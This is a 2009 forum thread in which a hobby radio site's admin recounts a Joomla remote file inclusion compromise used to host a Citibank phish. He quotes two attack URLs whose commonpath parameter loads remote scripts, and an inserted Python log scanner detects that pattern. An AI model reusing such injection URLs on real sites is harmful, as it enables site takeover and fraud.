Old 02-23-2009, 09:14 AM
Script-Kiddies, CitiBank and other over the top bs.

This past weekend was yet another episode of script-kiddies playing games on the AM web site. However, with a twist... Jim received the following email which he forwarded to me:
Dear Sir or Madam:

Cyveillance, an anti-fraud and security company, is under contract to assist
Citibank and its related entities in preventing or terminating online
activity that targets Citibank's clients as potential fraud victims. Cyveillance
has been made aware that you appear to be providing Internet Services to a
fraudulent Web site being used as part of a "phishing scam". This activity
violates Citibank copyright, trademark and other intellectual property rights
and may violate the criminal laws of the United States and other nations.

E-mail messages have been broadly distributed to individuals by a person or
entity pretending to be Citibank Bank. These e-mails use Citibank name and
identity (including trademarks) without authorization did not originate from
Citibank and this site is not an authorized Citibank site. The e-mails
request recipients to verify and submit sensitive details related to their
Citibank accounts. Within the fraudulent e-mail message, there is a link
that leads the recipients to a fraudulent website which is being hosted by
your company. The fraudulent website not only represents a misuse of
Citibank intellectual property; its purpose is designed to improperly obtain
personal information of Citibank customers in order to fraudulently access
their bank accounts. Contained in the email is an embedded URL:

URL: http://www.auralmoon.com/components/...ogon/index.htm
IP Address:
Case: [CY-2995-20090221-15109]

We understand that you may not be aware of this improper use of your
services and we appreciate your cooperation. We specifically would ask that
you also take the following actions directly to Citibank:

Please take all necessary steps to immediately shut down the fraudulent
website, terminate its availability to the Internet and discontinue the
transmission of any e-mails associated with this website.

In the event that you do not comply with the above, Citibank and its related
entities reserve all rights to take any action now or at any point in the

- Content of the Phishing site and any available Logs (Access, FTP, Mail, and Web)
- Any customer data that has been captured and/or stored on your systems or equipment
- Any records you maintain that indicate the name, contact information,
method of payment or similar information that may be useful in helping learn
about the identity and location of the customer for whom the website has
been operated.

Please send the above information to the following Citibank contacts:
Vishant Patel - [email protected] - (212) 657-2416
David Sun - [email protected] - (212) 657-3736
Tony Melone - [email protected] - (212) 657-4942

Thank you for your cooperation to prevent and terminate this fraudulent


Cyveillance Security Operations Center (CSOC)
Cyveillance, Inc.
Email: [email protected]
Toll Free: +1 (866) 553-0646
Direct: +1 (703) 351-2400

Citi Security and Investigative Service
Name: John Pignataro
Address: 111 Wall St, 19th Floor/Zone 7, New York, 10005
Tel: 212-657-0721
Email: [email protected]

======== ANALYST NOTES ========
It looks like a hacker has attached a fake bank page (a.k.a.
"phish") onto Aural Moon's Website. Please take a look and
do what you can to remove the bad files. Thank you in
advance for helping to protect our client and its customers
from bank fraud and identity theft. You may also want to
install any patches that would be needed to protect your
site in the future.

I will not be threatened or intimidated by assholes and told that I must take the web site down to protect their assets. If people using on-line banking are STUPID enough to fall for the shit perpetrated by these script-kiddies, it is NOT my fault, Jim's or Aural Moon's. Albert Einstein once said, "Two things are infinite: the universe and human stupidity; and I'm not sure about the universe."

Over the top or not, my response is below:
To whom this may concern:

I was forwarded a message, the content of which is below, concerning the
Aural Moon web site and a "phishing" scam.

I want to first address the tone of this message. I find it very wrong,
unprofessional, accusatory and arrogant. Had Mr. Brennan not forwarded
it to me, I would have simply disregarded it. You should reprimand
and/or fire the faineant dolt that composed this text as it's certainly NOT
worthy of my time to read, let alone address. If Cy-veillance has been
hired by CitiBank, their shareholders should be made aware of the lack
of Cy-veillance's fiduciary duty to address this issue with the proper
diligence it should have been afforded.

FWIW, I have been aware of the Aural Moon web site being exploited by a
script-kiddie or two in the past. Over the past few days, there has
been some further activity. However, I have not been able to address
this as I have been preoccupied over the past two months with the death
of a 95 year old grandmother, and the month long hospitalization and the
death (on Friday) of my mother-in-law. Yesterday, while I was attending
my granddaughter's christening and after party, this "shit hit the
fan". I did as much as I could at the party with my laptop and EVDO
internet connection. I finally had to cut my attendance at the party
short to head home to address this attack. I'm now wasting my time
addressing this email to you when I should be getting ready for the
viewing and the funeral of the mother-in-law.

Aural Moon is an internet radio station and web site. It is a hobby for
all those involved. It has been put together by a number of people that
were concerned in making a community and not as well focused on internet
security as they probably should have been. It's an internet radio site
and it was not considered to be all that interesting to the malevolence
of the internet no-good-nicks.

That said, I did find, after cleaning up quite the mess that the puerile
script-kiddies left (until well after 2am in the morning), interesting
clues as to the whys and wherefores of how the site was exploited. The
site is using Joomla as its CMS. The script-kitties used a hole in one
of the Joomla common files (which I have, now that I understand what and
how, closed) to execute their own scripts on OTHER servers. Here are 2
of the URLs that they used to execute/inject their code:

http: //www. auralmoon. com //playlist .php /db .php? commonpath=
http: //emmanuel. aubert. free. fr/ gunjibaba .txt???

http: //www. auralmoon. com //playlist .php /db .php? commonpath=
http: //offed. net /media /Shaun$ .txt?

I broke these URLs apart so that you can read them. Since you morons are
in the banking business on Wall Street, I assume you are using crap like
Micro$oft WEENDOZE to read this email.

If these hapless Cy-veillance sots are worth the salt, they will check
out the text of the scripts at free.fr and offed.net and see what these
little pricks were up to.

One last thing, I have the emails, albeit they are disposable Yahoo
email addys, for you of these script-kiddies. Maybe Yahoo can lend you
a hand in tracking them down. Make certain to address Yahoo with the
very same adamant verbiage used in the email forwarded to me by Mr.
Brennan for the quickest resolution.

[email protected] and [email protected]

PS. For Cy-veillance... if you're going to use Whois technical contact
information to contact me, like you did with the myriad phone calls I
have logged this past weekend, you should leave a voice mail message! I
pay good money to have a voice mail service, so bloody fucking use it!

Old 02-23-2009, 09:29 AM
Re: Script-Kiddies, CitiBank and other over the top bs.

Yeah, what he said. Thank you Vax.
Old 02-23-2009, 09:32 AM
Re: Script-Kiddies, CitiBank and other over the top bs.

Vax- 1st off, I would like to offer my warmest sympathy on your recent family deaths. After losing my 84 yr old Dad 4 mths ago to a 5 yr battle with prostate cancer, I share in your pain.

2nd I hope that this will blow over with not too much time resolving this f'in mess. Good Luck
Old 02-23-2009, 09:47 AM
Re: Script-Kiddies, CitiBank and other over the top bs.

My thoughts and sympathies go out to you vax my friend. Just don't let the bastards get you down. As far as the response to the letter, ouch! glad not to be on the receiving end of that one, but well said.
A cause du soleil, we're living here, we suffer dear, let's start new life today.
Old 02-24-2009, 06:09 AM
Re: Script-Kiddies, CitiBank and other over the top bs.

Though your sympathies are welcome, they were not necessary. The mention of the current family deaths was meant to put things into perspective for these idiots. As the idiom goes, I do not suffer fools gladly.

US code, 47 section 230(c)(1) provides immunity from the actions caused by these script kiddies:
No provider or user of an interactive computer service shall be treated as the publisher or speaker of any information provided by another information content provider.
These Cy-veillance folks claim to be in the cyber-security business and should be aware of this law. To threaten legal action or imply that CitiBank would or could take any legal action was inappropriate.
Old 02-24-2009, 09:49 AM
Re: Script-Kiddies, CitiBank and other over the top bs.

Excellent Vax, not at all over the top! Thank you for always doing such a great job for Aural Moon!!! And very, very sorry to hear about Martha's mom....

Love to you both, Angel
Old 02-24-2009, 08:22 PM
Re: Script-Kiddies, CitiBank and other over the top bs.

Originally Posted by AngelSings4u2
Excellent Vax, not at all over the top! Thank you for always doing such a great job for Aural Moon!!! And very, very sorry to hear about Martha's mom....

Love to you both, Angel
First, to set things straight, this was not Martha's mom. Martha's mom passed on 10 years ago. Martha's father remarried about 3 years after her mother passed. I didn't think that these sordid details were important for and would probably confuse these schmuck == Security Company Having Moronic Unbelievably Clueless Kooks.
Old 02-25-2009, 09:24 AM
Re: Script-Kiddies, CitiBank and other over the top bs.

VAX, I wonder if the script kiddies think that if they hack the site they are going to find Gigs 'o Gigs of music?

I'll bet that they do not know that the music is not stored here.

Old 02-25-2009, 09:36 AM
Re: Script-Kiddies, CitiBank and other over the top bs.

Originally Posted by PeterG
VAX, I wonder if the script kiddies think that if they hack the site they are going to find Gigs 'o Gigs of music?

I'll bet that they do not know that the music is not stored here.

They're not looking for music; they're looking to use the web site as a rogue outpost to do their dirty deeds. Exploiting a hole in one of the Joomla PHP scripts (which I have now closed), they were able to have the AM web site run their own scripts located on OTHER servers. Of course, we get the fingers pointed at us when this occurs.

FWIW, there has been very little activity on the AM server (and my router's flashing LEDs prove that out) other than what there should be since I plugged this hole and one other I found doing some googling.
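
Added example, not part of the original posts or the site's own code: a small Python log scan for the request pattern described in the first post and again in the reply above, where a query parameter such as commonpath carries a URL on another server. The log lines are constructed, files.example.net and the client addresses are placeholders, and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines (Apache common log format). Client addresses and
# files.example.net are placeholders, not values from the thread.
SAMPLE_LOG = """\
198.51.100.7 - - [22/Feb/2009:03:14:07 -0500] "GET //playlist.php/db.php?commonpath=http://files.example.net/a.txt??? HTTP/1.1" 200 512
203.0.113.9 - - [22/Feb/2009:03:15:10 -0500] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 8841
198.51.100.7 - - [22/Feb/2009:03:16:44 -0500] "GET /db.php?commonpath=http%253A%252F%252Ffiles.example.net%252Fb.txt HTTP/1.1" 200 498
203.0.113.20 - - [22/Feb/2009:03:17:02 -0500] "GET /out.php?url=http://www.auralmoon.com/forum/ HTTP/1.1" 302 0
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3})')
SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding, bounded so it always terminates."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def remote_host(value):
    """Host of an http/https/ftp URL value; None when the value is not one."""
    value = fully_decode(value).strip()
    if not SCHEME_RE.match(value):
        return None
    try:
        return (urlsplit(value).hostname or "").lower()
    except ValueError:  # malformed authority, still worth flagging
        return ""

def find_remote_includes(log_text, own_hosts):
    """One finding per query parameter that carries a URL on a foreign host."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        client, when, target, status = m.groups()
        path, _, query = target.partition("?")
        for name, raw in parse_qsl(query, keep_blank_values=True):
            host = remote_host(raw)
            if host is not None and host not in own_hosts:
                findings.append({"client": client, "time": when, "path": path,
                                 "param": name, "host": host, "status": int(status)})
    return findings
```

A hit records an attempt, not a successful include; the status code helps triage, but closing the hole still means fixing the PHP script or disabling remote includes with PHP's allow_url_include setting.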
Old 02-27-2009, 07:11 PM
Re: Script-Kiddies, CitiBank and other over the top bs.

Hey VAX, sorry to hear of all the shite you're dealing with due to these pinheads. Have you made a complaint to the feds yet? Not that I'd expect much action from them, but what the hell many of us are US tax payers, they work for us, this is clearly harassment, fraud, extortion, cyber-terrorism and prolly 20 other violations. Wait, that's the ticket, call it terrorism that might elicit some action right? No? Oh well. Anyway, if you haven't, I'd report it, just in the off chance that they might be caught and one or more of them would find a new 7 ft. tall boyfriend in some penitentiary. Stranger things have happened...
Old 02-27-2009, 08:55 PM
Re: Script-Kiddies, CitiBank and other over the top bs.

Give 'em hell VAX.

One day soon us taxpayers will own Citibank and we can add government oversight to this wreckage of a company. A bright future awaits us all. I can't wait for my stockholder bonus check.

Old 02-28-2009, 09:37 AM
Re: Script-Kiddies, CitiBank and other over the top bs.

Originally Posted by jtmckinley
Hey VAX, sorry to hear of all the shite you're dealing with due to these pinheads. Have you made a complaint to the feds yet? Not that I'd expect much action from them, but what the hell many of us are US tax payers, they work for us, this is clearly harassment, fraud, extortion, cyber-terrorism and prolly 20 other violations. Wait, that's the ticket, call it terrorism that might elicit some action right? No? Oh well. Anyway, if you haven't, I'd report it, just in the off chance that they might be caught and one or more of them would find a new 7 ft. tall boyfriend in some penitentiary. Stranger things have happened...
You forget, I once worked under contract to the DoD in an R&D lab. The only people around me with an IQ were under contract. There's good reason they're called simple-servants.

I have no faith in my gov't... not anymore and even less with the $787B/bbl snake oil spending spree they've gone on. To add insult to the injury, you have attorneys prosecuting and defending people for cyber-crimes and they themselves don't know how to use a computer. The stench of gov't hypocrisy and stupidity fills the air like a newly manure fecundated field.
Old 02-28-2009, 09:43 AM
Re: Script-Kiddies, CitiBank and other over the top bs.

Originally Posted by woodchuckvt
Give 'em hell VAX.

One day soon us taxpayers will own Citibank and we can add government oversight to this wreckage of a company. A bright future awaits us all. I can't wait for my stockholder bonus check.

Sorry, woodchuck, they're spending your dividend on lavish parties in Las Vegas with golf outings, Tiffany gifts in Burberry bags, private concerts, Chateaubriand, Beluga caviar, Dom Perignon, and call-girls.
Old 02-28-2009, 11:38 AM
Re: Script-Kiddies, CitiBank and other over the top bs.

Careful VAX............remember Canvas.
Old 02-28-2009, 05:12 PM
Re: Script-Kiddies, CitiBank and other over the top bs.


I've already borrowed on and leveraged my Citibank taxpayer bonus check with a high yield Antiguan CD. Talk about high finance

Dang, is that a tongue stuck in that cheek ?
Old 03-04-2009, 06:42 AM
Re: Script-Kiddies, CitiBank and other over the top bs.

what a pain
